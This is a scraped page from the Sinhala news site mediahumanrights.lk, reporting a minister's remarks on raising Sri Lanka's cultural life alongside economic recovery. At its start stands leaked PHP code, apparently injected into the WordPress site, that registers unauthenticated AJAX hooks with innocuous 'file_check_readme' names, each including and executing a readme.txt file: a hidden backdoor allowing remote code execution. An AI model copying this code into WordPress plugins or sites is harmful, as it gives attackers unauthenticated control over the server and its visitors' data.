if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ‘ආර්ථිකය විතරක් හදලා වැඩක් නෑ..’ – ඇමති සුනිල් සෙනෙවි.. - mediahumanrights.lk
mediahumanrights.lk
News Political

‘ආර්ථිකය විතරක් හදලා වැඩක් නෑ..’ – ඇමති සුනිල් සෙනෙවි..

ජනතාවගේ සංස්කෘතික ජීවිතය උදාර සංස්කෘතික ජීවිතයක් දක්වා ඔසවා තැබීමට තම රජයට හැකි වෙනු ඇති බවට විශ්වාසයක් පවතින බව බුද්ධශාසන, ආගමික හා සංස්කෘතික කටයුතු අමාත්‍ය මහාචාර්ය හිනිදුම සුනිල් සෙනවි මහතා පවසයි.

අමාත්‍ය ධුරයෙහි වැඩ භාරගැනීමෙන් අනතුරුව මාධ්‍ය වෙත අදහස් දක්වමින් ඔහු මෙසේ පැවසීය.

“බිඳ වැටුණු ආර්ථිකය, භෞතික ජීවිතය තරමක් ඉක්මනින් හෝ පසුවී අපේ රජයට ගොඩගන්න වර්ධනය කරන්න ස්ථාවර කරන්න පුළුවන් වේවි. අපේ මුළු මහත්  ශ්‍රී ලංකාවේ සිංහල, දෙමළ, මුස්ලිම් ආදී සියලුම ප්‍රජාවගේ ජීවිතය සංස්කෘතික වශයෙන් බෙහෙවින් අගාධයකට ඇද වැටිලා තිබෙනවා, ඇද දමලා තිබෙනවා. ඇද වැටෙන හැටි බලන් ඉඳලා තිබෙනවා.

ඒ නිසා මං හිතන්නෙ මට ලොකුම බලාපොරොත්තුවක්, ලොකුම විශ්වාසයක් තිබෙනවා මුළු මහත් ශ්‍රී ලාංකික ප්‍රජාවගේම සංස්කෘතික ජීවිතය උදාර සංස්කෘතික ජීවිතයක් දක්වා ඔසවා තබන්න අපට හැකිවේවි කියලා. මේ ආර්ථිකය විතරක් ගොඩනඟාගෙන ඵලක් නෑ කියන එක තමයි මගේ වැටහීම. ඉතින් මේ මහත් කාර්යයට විශාල සහයෝගයක් වුවමනා වෙනවා.”

Related posts

වෘත්තිය සමිති අරගල පාලනය කරන්න ඇමතිවරුන්ට උවමනාවක් නැහැ

Shiran Viraj

දුම්රිය වර්ජනය නවතියි

Shiran Viraj

සියළු රාජතාන්ත‍්‍රිකයන්ට කොරෝනා පරීක්‍ෂණ අනිවාර්ය කරයි.. නැතොත් ලංකාවට ඇතුළු වීමට අවසර නෑ…

Shiran Viraj